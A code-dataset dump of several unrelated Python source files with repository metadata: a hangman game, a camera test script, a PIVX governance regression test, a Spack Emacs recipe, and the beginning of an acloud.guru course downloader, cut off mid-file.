hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3fac10f2bdcd4b7a618ca11ab49572dc143b26f3
| 2,050
|
py
|
Python
|
hangman/game.py
|
leonracsis/itp-u4-c2-hangman-game
|
99b7d225f27f779c9ee114223c719ab569e76075
|
[
"MIT"
] | null | null | null |
hangman/game.py
|
leonracsis/itp-u4-c2-hangman-game
|
99b7d225f27f779c9ee114223c719ab569e76075
|
[
"MIT"
] | null | null | null |
hangman/game.py
|
leonracsis/itp-u4-c2-hangman-game
|
99b7d225f27f779c9ee114223c719ab569e76075
|
[
"MIT"
] | null | null | null |
from .exceptions import *
import random
# Complete with your own, just for fun :)
LIST_OF_WORDS = []
def _get_random_word(list_of_words):
if not list_of_words:
raise InvalidListOfWordsException("Invalid List of Words")
return random.choice(list_of_words)
def _mask_word(word):
if not word:
raise InvalidWordException("Invalid Words")
return '*'*len(word)
def _uncover_word(answer_word, masked_word, character):
if not answer_word or not masked_word or len(answer_word) != len(masked_word):
raise InvalidWordException("Invalid Words")
if len(character) > 1:
raise InvalidGuessedLetterException("Only one letter to guess")
result_str=''
for idx, letter in enumerate(answer_word):
if character.lower() ==letter.lower():
result_str+=answer_word[idx].lower()
else:
result_str+=masked_word[idx].lower()
return result_str
def guess_letter(game, letter):
if game['masked_word']==game['answer_word']:
raise GameFinishedException("You Win")
if game['remaining_misses']==0:
raise GameFinishedException()
new_masked =_uncover_word(game['answer_word'], game['masked_word'],letter)
if new_masked ==game['answer_word']:
game['masked_word']=new_masked
raise GameWonException("You Win")
if game['masked_word']==new_masked:
game['remaining_misses'] -= 1
else:
game['masked_word']=new_masked
game['previous_guesses'] += letter.lower()
if game['remaining_misses']==0:
raise GameLostException()
def start_new_game(list_of_words=None, number_of_guesses=5):
if list_of_words is None:
list_of_words = LIST_OF_WORDS
word_to_guess = _get_random_word(list_of_words)
masked_word = _mask_word(word_to_guess)
game = {
'answer_word': word_to_guess,
'masked_word': masked_word,
'previous_guesses': [],
'remaining_misses': number_of_guesses,
}
return game
| 28.082192
| 82
| 0.662439
|
a435a0c9f61e09b94da41c9c8e31e6bb65e4f740
| 873
|
py
|
Python
|
CameraTest.py
|
pinaxe1/OrangePI-One-Tensorflow
|
fc5382b168a8007036ec02d63530663ad9f63063
|
[
"MIT"
] | null | null | null |
CameraTest.py
|
pinaxe1/OrangePI-One-Tensorflow
|
fc5382b168a8007036ec02d63530663ad9f63063
|
[
"MIT"
] | null | null | null |
CameraTest.py
|
pinaxe1/OrangePI-One-Tensorflow
|
fc5382b168a8007036ec02d63530663ad9f63063
|
[
"MIT"
] | null | null | null |
'''
The program expect presence of /dev/video1 device which is turn created by v4l2loopback and receiving feed grom vidcopy
to activate device next 7 commands should be performed on OrangePi Armbian
sudo sunxi-pio -m "PG11<1><0><1><1>"
sudo modprobe gc2035
sudo modprobe vfe_v4l2
sleep 5
sudo modprobe v4l2loopback
cd ~/vidcopy
./vidcopy -w 800 -h 600 -r 30 -i /dev/video0 -o /dev/video1 -f UYVY
'''
import cv2
c = cv2.VideoCapture(1)
while(1):sudo
_,f = c.read()
cv2.imshow('Camera Orange Pi',f)
k = cv2.waitKey(5)
if k==1048603:
#Esc key to stop, or 27 depending your keyboard
#Touche ESC appuyee. le code peut dependre du clavier. Normalement 27
break
elif k==-1:
continue
#uncomment to know the code of of the key pressed
#Decommenter pour connaitre le code de la touche pressee
#else:
#print k
cv2.destroyAllWindows()
| 26.454545
| 119
| 0.71134
|
70a42960e3d7d2d8c39b5723e1a04d49e20b347b
| 91
|
py
|
Python
|
src/pygame-demo/snek/core/colors.py
|
Adam-Jimenez/python-demo
|
c1d222d88f62a5b6bfdfa01bbbc9e2fdce5a1d6b
|
[
"MIT"
] | null | null | null |
src/pygame-demo/snek/core/colors.py
|
Adam-Jimenez/python-demo
|
c1d222d88f62a5b6bfdfa01bbbc9e2fdce5a1d6b
|
[
"MIT"
] | null | null | null |
src/pygame-demo/snek/core/colors.py
|
Adam-Jimenez/python-demo
|
c1d222d88f62a5b6bfdfa01bbbc9e2fdce5a1d6b
|
[
"MIT"
] | null | null | null |
COLORS = {
'white': (255, 255, 255),
'red': (255, 0, 0),
'black': (0, 0, 0),
}
| 15.166667
| 29
| 0.395604
|
6d57dabc71759ad84ce3b23d8ff25205879e7af3
| 869
|
py
|
Python
|
setup.py
|
spasche/aiohue
|
65798ed56f6f123a24a961ac87f604d79a221540
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
spasche/aiohue
|
65798ed56f6f123a24a961ac87f604d79a221540
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
spasche/aiohue
|
65798ed56f6f123a24a961ac87f604d79a221540
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import setup, find_packages
long_description = open('README.md').read()
setup(
name='aiohue',
version='2.5.1',
license='Apache License 2.0',
url='https://github.com/home-assistant-libs/aiohue',
author='Paulus Schoutsen',
author_email='paulus@paulusschoutsen.nl',
description='Python module to talk to Philips Hue.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=['aiohue'],
zip_safe=True,
platforms='any',
install_requires=list(val.strip() for val in open('requirements.txt')),
classifiers=[
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| 31.035714
| 75
| 0.669735
|
b5159f160a8cb80cfb425d3198b06cfe05ef8c47
| 6,483
|
py
|
Python
|
test/functional/tiertwo_governance_invalid_budget.py
|
PivxLiteDev/PivxLite
|
648d4a193b61b1996b41e9f6c6c468875c757cdd
|
[
"MIT"
] | null | null | null |
test/functional/tiertwo_governance_invalid_budget.py
|
PivxLiteDev/PivxLite
|
648d4a193b61b1996b41e9f6c6c468875c757cdd
|
[
"MIT"
] | 3
|
2020-02-06T10:15:07.000Z
|
2022-01-13T00:08:49.000Z
|
test/functional/tiertwo_governance_invalid_budget.py
|
PivxLiteDev/PivxLite
|
648d4a193b61b1996b41e9f6c6c468875c757cdd
|
[
"MIT"
] | 9
|
2020-03-10T14:14:25.000Z
|
2022-03-05T13:43:35.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2021 The PIVX developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or https://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import PivxlTestFramework
from test_framework.util import (
assert_equal,
p2p_port,
)
import os
import time
class GovernanceInvalidBudgetTest(PivxlTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
# 3 nodes:
# - 1 miner/mncontroller
# - 2 remote mns
self.num_nodes = 3
self.extra_args = [["-sporkkey=932HEevBSujW2ud7RfB1YF91AFygbBRQj3de3LyaCRqNzKKgWXi"],
[],
[],
]
self.enable_mocktime()
self.minerAPos = 0
self.remoteOnePos = 1
self.remoteTwoPos = 2
self.masternodeOneAlias = "mnOne"
self.masternodeTwoAlias = "mntwo"
self.mnOnePrivkey = "9247iC59poZmqBYt9iDh9wDam6v9S1rW5XekjLGyPnDhrDkP4AK"
self.mnTwoPrivkey = "92Hkebp3RHdDidGZ7ARgS4orxJAGyFUPDXNqtsYsiwho1HGVRbF"
def run_test(self):
self.minerA = self.nodes[self.minerAPos] # also controller of mn1 and mn2
self.mn1 = self.nodes[self.remoteOnePos]
self.mn2 = self.nodes[self.remoteTwoPos]
self.setupContext()
# Create a valid proposal and vote on it
next_superblock = self.minerA.getnextsuperblock()
payee = self.minerA.getnewaddress()
self.log.info("Creating a proposal to be paid at block %d" % next_superblock)
proposalFeeTxId = self.minerA.preparebudget("test1", "https://test1.org", 2,
next_superblock, payee, 300)
self.stake_and_ping(self.minerAPos, 3, [self.mn1, self.mn2])
proposalHash = self.minerA.submitbudget("test1", "https://test1.org", 2,
next_superblock, payee, 300, proposalFeeTxId)
time.sleep(1)
self.stake_and_ping(self.minerAPos, 7, [self.mn1, self.mn2])
self.log.info("Vote for the proposal and check projection...")
self.minerA.mnbudgetvote("alias", proposalHash, "yes", self.masternodeOneAlias)
self.minerA.mnbudgetvote("alias", proposalHash, "yes", self.masternodeTwoAlias)
time.sleep(1)
self.stake_and_ping(self.minerAPos, 1, [self.mn1, self.mn2])
projection = self.mn1.getbudgetprojection()[0]
assert_equal(projection["Name"], "test1")
assert_equal(projection["Hash"], proposalHash)
assert_equal(projection["Yeas"], 2)
# Try to create an invalid finalized budget, paying to an nonexistent proposal
self.log.info("Creating invalid budget finalization...")
self.stake_and_ping(self.minerAPos, 5, [self.mn1, self.mn2])
budgetname = "invalid finalization"
blockstart = self.minerA.getnextsuperblock()
proposals = []
badPropId = "aa0061d705de36385c37701e7632408bd9d2876626b1299a17f7dc818c0ad285"
badPropPayee = "8c988f1a4a4de2161e0f50aac7f17e7f9555caa4"
badPropAmount = 500
proposals.append({"proposalid": badPropId, "payee": badPropPayee, "amount": badPropAmount})
res = self.minerA.createrawmnfinalbudget(budgetname, blockstart, proposals)
assert(res["result"] == "tx_fee_sent")
feeBudgetId = res["id"]
time.sleep(1)
self.stake_and_ping(self.minerAPos, 4, [self.mn1, self.mn2])
res = self.minerA.createrawmnfinalbudget(budgetname, blockstart, proposals, feeBudgetId)
assert(res["result"] == "error") # not accepted
self.log.info("Good, invalid budget not accepted.")
def send_3_pings(self, mn_list):
self.advance_mocktime(30)
self.send_pings(mn_list)
self.stake_and_ping(self.minerAPos, 1, mn_list)
self.advance_mocktime(30)
self.send_pings(mn_list)
time.sleep(2)
def setupContext(self):
# First mine 250 PoW blocks (250 with minerA)
self.log.info("Generating 259 blocks...")
for _ in range(250):
self.mocktime = self.generate_pow(self.minerAPos, self.mocktime)
self.sync_blocks()
# Then stake 9 blocks with minerA
self.stake_and_ping(self.minerAPos, 9, [])
for n in self.nodes:
assert_equal(n.getblockcount(), 259)
# Setup Masternodes
self.log.info("Masternodes setup...")
ownerdir = os.path.join(self.options.tmpdir, "node%d" % self.minerAPos, "regtest")
self.mnOneCollateral = self.setupMasternode(self.minerA, self.minerA, self.masternodeOneAlias,
ownerdir, self.remoteOnePos, self.mnOnePrivkey)
self.mnTwoCollateral = self.setupMasternode(self.minerA, self.minerA, self.masternodeTwoAlias,
ownerdir, self.remoteTwoPos, self.mnTwoPrivkey)
# Activate masternodes
self.log.info("Masternodes activation...")
self.stake_and_ping(self.minerAPos, 1, [])
time.sleep(3)
self.advance_mocktime(10)
remoteOnePort = p2p_port(self.remoteOnePos)
remoteTwoPort = p2p_port(self.remoteTwoPos)
self.mn1.initmasternode(self.mnOnePrivkey, "127.0.0.1:"+str(remoteOnePort))
self.mn2.initmasternode(self.mnTwoPrivkey, "127.0.0.1:"+str(remoteTwoPort))
self.stake_and_ping(self.minerAPos, 1, [])
self.wait_until_mnsync_finished()
self.controller_start_masternode(self.minerA, self.masternodeOneAlias)
self.controller_start_masternode(self.minerA, self.masternodeTwoAlias)
self.wait_until_mn_preenabled(self.mnOneCollateral.hash, 40)
self.wait_until_mn_preenabled(self.mnOneCollateral.hash, 40)
self.send_3_pings([self.mn1, self.mn2])
self.wait_until_mn_enabled(self.mnOneCollateral.hash, 120, [self.mn1, self.mn2])
self.wait_until_mn_enabled(self.mnOneCollateral.hash, 120, [self.mn1, self.mn2])
# activate sporks
self.log.info("Masternodes enabled. Activating sporks.")
self.activate_spork(self.minerAPos, "SPORK_8_MASTERNODE_PAYMENT_ENFORCEMENT")
self.activate_spork(self.minerAPos, "SPORK_9_MASTERNODE_BUDGET_ENFORCEMENT")
self.activate_spork(self.minerAPos, "SPORK_13_ENABLE_SUPERBLOCKS")
if __name__ == '__main__':
GovernanceInvalidBudgetTest().main()
| 45.65493
| 102
| 0.660651
|
393def5cc5f85611b7a3a548753abfd8dc1919ec
| 2,974
|
py
|
Python
|
var/spack/repos/builtin/packages/emacs/package.py
|
robertodr/spack
|
9b809e01b47d48f01b3d257912fe1b752943cd3d
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1
|
2021-07-03T22:53:51.000Z
|
2021-07-03T22:53:51.000Z
|
var/spack/repos/builtin/packages/emacs/package.py
|
robertodr/spack
|
9b809e01b47d48f01b3d257912fe1b752943cd3d
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1
|
2021-03-23T17:08:14.000Z
|
2021-04-01T17:18:22.000Z
|
var/spack/repos/builtin/packages/emacs/package.py
|
robertodr/spack
|
9b809e01b47d48f01b3d257912fe1b752943cd3d
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2020-01-10T18:54:54.000Z
|
2021-07-03T22:57:16.000Z
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import sys
class Emacs(AutotoolsPackage, GNUMirrorPackage):
"""The Emacs programmable text editor."""
homepage = "https://www.gnu.org/software/emacs"
gnu_mirror_path = "emacs/emacs-24.5.tar.gz"
version('27.1', sha256='ffbfa61dc951b92cf31ebe3efc86c5a9d4411a1222b8a4ae6716cfd0e2a584db')
version('26.3', sha256='09c747e048137c99ed35747b012910b704e0974dde4db6696fde7054ce387591')
version('26.2', sha256='4f99e52a38a737556932cc57479e85c305a37a8038aaceb5156625caf102b4eb')
version('26.1', sha256='760382d5e8cdc5d0d079e8f754bce1136fbe1473be24bb885669b0e38fc56aa3')
version('25.3', sha256='f72c6a1b48b6fbaca2b991eed801964a208a2f8686c70940013db26cd37983c9')
version('25.2', sha256='505bbd6ea6c197947001d0f80bfccb6b30e1add584d6376f54d4fd6e4de72d2d')
version('25.1', sha256='763344b90db4d40e9fe90c5d14748a9dbd201ce544e2cf0835ab48a0aa4a1c67')
version('24.5', sha256='2737a6622fb2d9982e9c47fb6f2fb297bda42674e09db40fc9bcc0db4297c3b6')
variant('X', default=False, description="Enable an X toolkit")
variant(
'toolkit',
default='gtk',
values=('gtk', 'athena'),
description="Select an X toolkit (gtk, athena)"
)
variant('tls', default=False, description="Build Emacs with gnutls")
depends_on('pkgconfig', type='build')
depends_on('ncurses')
depends_on('pcre')
depends_on('zlib')
depends_on('libxml2')
depends_on('libtiff', when='+X')
depends_on('libpng', when='+X')
depends_on('libxpm', when='+X')
depends_on('giflib', when='+X')
depends_on('libx11', when='+X')
depends_on('libxaw', when='+X toolkit=athena')
depends_on('gtkplus', when='+X toolkit=gtk')
depends_on('gnutls', when='+tls')
depends_on('jpeg')
conflicts('@:26.3', when='platform=darwin os=catalina')
@when('platform=darwin')
def setup_build_environment(self, env):
# on macOS, emacs' config does search hard enough for ncurses'
# termlib `-ltinfo` lib, which results in linker errors
if '+termlib' in self.spec['ncurses']:
env.append_flags('LDFLAGS', '-ltinfo')
def configure_args(self):
spec = self.spec
toolkit = spec.variants['toolkit'].value
if '+X' in spec:
args = [
'--with-x',
'--with-x-toolkit={0}'.format(toolkit)
]
else:
args = ['--without-x']
# On OS X/macOS, do not build "nextstep/Emacs.app", because
# doing so throws an error at build-time
if sys.platform == 'darwin':
args.append('--without-ns')
if '+tls' in spec:
args.append('--with-gnutls')
else:
args.append('--without-gnutls')
return args
| 35.831325
| 94
| 0.662744
|
b88a9d298f7666f29844056e86e393e4c4925d38
| 21,957
|
py
|
Python
|
acloud-dl.py
|
affansyed/acloud-dl
|
dcf350c2e9e22466a128e89b5758bdc2bb982ff1
|
[
"MIT"
] | null | null | null |
acloud-dl.py
|
affansyed/acloud-dl
|
dcf350c2e9e22466a128e89b5758bdc2bb982ff1
|
[
"MIT"
] | null | null | null |
acloud-dl.py
|
affansyed/acloud-dl
|
dcf350c2e9e22466a128e89b5758bdc2bb982ff1
|
[
"MIT"
] | 1
|
2021-12-07T15:19:28.000Z
|
2021-12-07T15:19:28.000Z
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# pylint: disable=E,C,W,R
import sys
import time
import acloud
import argparse
from acloud import __version__
from acloud._colorized import *
from acloud._getpass import GetPass
from acloud._vtt2srt import WebVtt2Srt
from acloud._progress import ProgressBar
from acloud._colorized.banner import banner
getpass = GetPass()
class CloudGuru(WebVtt2Srt, ProgressBar, GetPass):
def __init__(self, cookies=''):
self.cookies = cookies
super(CloudGuru, self).__init__()
@staticmethod
def courses_not_downloaded(coursesList, path="", isFiltering=False):
if not isFiltering or path == "":
return coursesList
res = list()
downloaded_courses = os.listdir(path)
for course in coursesList:
cr_name = '{}'.format(course)
if cr_name in downloaded_courses:
continue
res.append(course)
return res
def courses_downloaded(self, path='', download_all=False, download_only_new=False):
sys.stdout.write('\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb +
"Downloading accessible courses information .. \r")
courses = self.courses_not_downloaded(acloud.courses(cookies=self.cookies), path, download_only_new)
if not download_all:
sys.stdout.write('\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb +
"Downloading accessible courses information .. (done)\r\n")
counter = 1
for course in courses:
title = course.title
sys.stdout.write(fc + sd + "[" + fm + sb + "%s" % counter + fc + sd + "] : " + fg + sb + "%s\n" % title)
counter += 1
question = fc + sd + "[" + fw + sb + "?" + fc + sd + "] : " + fy + sb + "select course number or range (1/%s/range): " % (len(courses)) + fg + sb
ask_user = self._getuser(prompt=question)
# setting default to download all if no user input is provided
if ask_user and ask_user[-1] == '+':
course_number = int(ask_user.split('+')[0])
if 0 < course_number <= len(courses):
course_number = course_number - 1
courses = courses[course_number:len(courses)]
elif ask_user and ask_user[-1] != "+":
course_number = int(ask_user)
if 0 < course_number <= len(courses):
course_number = course_number - 1
courses = [courses[course_number]]
else:
download_all = True
for course in courses:
course_name = course.title
sys.stdout.write(
"\n" + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Course " + fb + sb + "'%s'.\n" % course_name)
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading course information .. \r")
course = course.get_course(keep_alive=download_all)
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloaded course information .. (done)\r\n")
chapters = course.get_chapters()
total_lectures = course.lectures
total_chapters = course.chapters
sys.stdout.write(
fc + sd + "[" + fm + sb + "+" + fc + sd + "] : " + fg + sd + "Chapter(s) (%s).\n" % total_chapters)
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture(s) (%s).\n" % total_lectures)
for chapter in chapters:
chapter_title = chapter.title
lectures = chapter.get_lectures()
lectures_count = chapter.lectures
sys.stdout.write(
'\n' + fc + sd + "[" + fw + sb + "+" + fc + sd + "] : " + fw + sd + "Chapter (%s)\n" % chapter_title)
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture(s) (%s).\n" % lectures_count)
for lecture in lectures:
lecture_id = lecture.id
lecture_best = lecture.getbest()
lecture_streams = lecture.streams
lecture_assets = lecture.assets
if lecture_streams:
sys.stdout.write(fc + sd + " - " + fy + sb + "duration : " + fm + sb + str(
lecture.duration) + fy + sb + ".\n")
sys.stdout.write(fc + sd + " - " + fy + sb + "Lecture id : " + fm + sb + str(
lecture_id) + fy + sb + ".\n")
for stream in lecture_streams:
content_length = stream.get_filesize()
if content_length != 0:
if content_length <= 1048576.00:
size = round(float(content_length) / 1024.00, 2)
sz = format(size if size < 1024.00 else size / 1024.00, '.2f')
in_megabytes = 'KB' if size < 1024.00 else 'MB'
else:
size = round(float(content_length) / 1048576, 2)
sz = format(size if size < 1024.00 else size / 1024.00, '.2f')
in_megabytes = "MB " if size < 1024.00 else 'GB '
if lecture_best.dimention[1] == stream.dimention[1]:
in_megabytes = in_megabytes + fc + sb + "(Best)" + fg + sd
sys.stdout.write('\t- ' + fg + sd + "{:<23} {:<8}{}{}{}{}\n".format(str(stream), str(
stream.dimention[1]) + 'p', sz, in_megabytes, fy, sb))
time.sleep(0.5)
if lecture_assets:
for asset in lecture_assets:
if asset.mediatype != 'external_link':
content_length = asset.get_filesize()
if content_length != 0:
if content_length <= 1048576.00:
size = round(float(content_length) / 1024.00, 2)
sz = format(size if size < 1024.00 else size / 1024.00, '.2f')
in_megabytes = 'KB' if size < 1024.00 else 'MB'
else:
size = round(float(content_length) / 1048576, 2)
sz = format(size if size < 1024.00 else size / 1024.00, '.2f')
in_megabytes = "MB " if size < 1024.00 else 'GB '
sys.stdout.write(
'\t- ' + fg + sd + "{:<23} {:<8}{}{}{}{}\n".format(str(asset), asset.extension,
sz, in_megabytes, fy, sb))
def download_subtitles(self, subtitle='', filepath=''):
if subtitle:
filename = "%s\\%s" % (filepath, subtitle.filename) if os.name == 'nt' else "%s/%s" % (
filepath, subtitle.filename)
try:
retval = subtitle.download(filepath=filepath, quiet=True)
except KeyboardInterrupt:
sys.stdout.write(fc + sd + "\n[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "User Interrupted..\n")
sys.exit(0)
else:
msg = retval.get('msg')
if msg == "download":
self.convert(filename=filename)
def download_assets(self, lecture_assets='', filepath=''):
if lecture_assets:
for assets in lecture_assets:
title = assets.filename
mediatype = assets.mediatype
if mediatype == "external_link":
assets.download(filepath=filepath, quiet=True, callback=self.show_progress)
else:
sys.stdout.write(
fc + sd + "\n[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Downloading asset(s)\n")
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Downloading (%s)\n" % title)
try:
retval = assets.download(filepath=filepath, quiet=True, callback=self.show_progress)
except KeyboardInterrupt:
sys.stdout.write(
fc + sd + "\n[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "User Interrupted..\n")
sys.exit(0)
else:
msg = retval.get('msg')
if msg == 'already downloaded':
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Asset : '%s' " % title + fy + sb + "(already downloaded).\n")
elif msg == 'download':
sys.stdout.write(
fc + sd + "[" + fm + sb + "+" + fc + sd + "] : " + fg + sd + "Downloaded (%s)\n" % title)
else:
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Asset : '%s' " % title + fc + sb + "(download skipped).\n")
sys.stdout.write(
fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "{}\n".format(msg))
def download_lectures(self, lecture_best='', lecture_title='', inner_index='', lectures_count='', filepath='',
user_extension=''):
if lecture_best:
sys.stdout.write(
fc + sd + "\n[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture(s) : ({index} of {total})\n".format(
index=inner_index, total=lectures_count))
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Downloading (%s)\n" % lecture_title)
try:
retval = lecture_best.download(filepath=filepath, quiet=True, user_extension=user_extension,
callback=self.show_progress)
except KeyboardInterrupt:
sys.stdout.write(fc + sd + "\n[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "User Interrupted..\n")
sys.exit(0)
msg = retval.get('msg')
if msg == 'already downloaded':
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture : '%s' " % lecture_title + fy + sb + "(already downloaded).\n")
elif msg == 'download':
sys.stdout.write(
fc + sd + "[" + fm + sb + "+" + fc + sd + "] : " + fg + sd + "Downloaded (%s)\n" % lecture_title)
else:
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture : '%s' " % lecture_title + fc + sb + "(download skipped).\n")
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "{}\n".format(msg))
def download_lectures_only(self, lecture_best='', lecture_title='', inner_index='', lectures_count='',
lecture_assets='', lecture_subs='', filepath='', user_extension=''):
if lecture_best:
self.download_lectures(lecture_best=lecture_best, lecture_title=lecture_title, inner_index=inner_index,
lectures_count=lectures_count, filepath=filepath,
user_extension=user_extension)
if lecture_assets:
self.download_assets(lecture_assets=lecture_assets, filepath=filepath)
if lecture_subs:
self.download_subtitles(subtitle=lecture_subs, filepath=filepath)
def course_download(self, path='', quality='', user_extension='', download_all=False, download_only_new=False):
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading accessible courses information .. \r")
courses = self.courses_not_downloaded(acloud.courses(cookies=self.cookies), path, download_only_new)
if not download_all:
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading accessible courses information .. (done)\r\n")
counter = 1
for course in courses:
title = course.title
sys.stdout.write(fc + sd + "[" + fm + sb + "%s" % counter + fc + sd + "] : " + fg + sb + "%s\n" % title)
counter += 1
question = fc + sd + "[" + fw + sb + "?" + fc + sd + "] : " + fy + sb + "select course number or range (1/%s/range): " % (
len(courses)) + fg + sb
ask_user = self._getuser(prompt=question)
# setting default to download all if no user input is provided
if ask_user and ask_user[-1] == '+':
course_number = int(ask_user.split('+')[0])
if 0 < course_number <= len(courses):
course_number = course_number - 1
courses = courses[course_number:len(courses)]
elif ask_user and ask_user[-1] != "+":
course_number = int(ask_user)
if 0 < course_number <= len(courses):
course_number = course_number - 1
courses = [courses[course_number]]
else:
download_all = True
for course in courses:
course_name = course.title
sys.stdout.write(
"\n" + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Course " + fb + sb + "'%s'.\n" % course_name)
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading course information .. \r")
course = course.get_course(keep_alive=download_all)
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloaded course information .. (done)\r\n")
chapters = course.get_chapters()
total_lectures = course.lectures
total_chapters = course.chapters
sys.stdout.write(
fc + sd + "[" + fm + sb + "+" + fc + sd + "] : " + fg + sd + "Chapter(s) (%s).\n" % total_chapters)
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture(s) (%s).\n" % total_lectures)
if path:
if '~' in path:
path = os.path.expanduser(path)
course_path = "%s\\%s" % (path, course_name) if os.name == 'nt' else "%s/%s" % (path, course_name)
else:
path = os.getcwd()
course_path = "%s\\%s" % (path, course_name) if os.name == 'nt' else "%s/%s" % (path, course_name)
for chapter in chapters:
chapter_index = chapter.index
chapter_title = chapter.title
lectures = chapter.get_lectures()
lectures_count = chapter.lectures
filepath = "%s\\%s" % (course_path, chapter_title) if os.name == 'nt' else "%s/%s" % (
course_path, chapter_title)
_ = course.create_chapter(filepath=filepath)
sys.stdout.write(
fc + sd + "\n[" + fm + sb + "*" + fc + sd + "] : " + fm + sb + "Downloading chapter : ({index} of {total})\n".format(
index=chapter_index, total=total_chapters))
sys.stdout.write(
fc + sd + "[" + fw + sb + "+" + fc + sd + "] : " + fw + sd + "Chapter (%s)\n" % chapter_title)
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Found (%s) lectures ...\n" % lectures_count)
for lecture in lectures:
lecture_index = lecture.index
lecture_title = lecture.title
lecture_best = lecture.getbest()
lecture_streams = lecture.streams
lecture_assets = lecture.assets
lecture_subs = lecture.subtitle
lecture_best = lecture.get_quality(best_quality=lecture_best, streams=lecture_streams,
requested=quality)
self.download_lectures_only(lecture_best=lecture_best, lecture_title=lecture_title,
inner_index=lecture_index, lectures_count=lectures_count,
lecture_assets=lecture_assets, lecture_subs=lecture_subs,
filepath=filepath, user_extension=user_extension)
def main():
sys.stdout.write(banner())
version = "%(prog)s {version}".format(version=__version__)
description = 'A cross-platform python based utility to download courses from acloud.guru for personal offline use.'
parser = argparse.ArgumentParser(description=description, conflict_handler="resolve")
general = parser.add_argument_group("General")
general.add_argument(
'-h', '--help',
action='help',
help="Shows the help.")
general.add_argument(
'-v', '--version',
action='version',
version=version,
help="Shows the version.")
authentication = parser.add_argument_group("Authentication")
authentication.add_argument(
'-c', '--cookies',
dest='cookies',
type=str,
help="Cookies to authenticate with.", metavar='')
advance = parser.add_argument_group("Advance")
advance.add_argument(
'-o', '--output',
dest='output',
type=str,
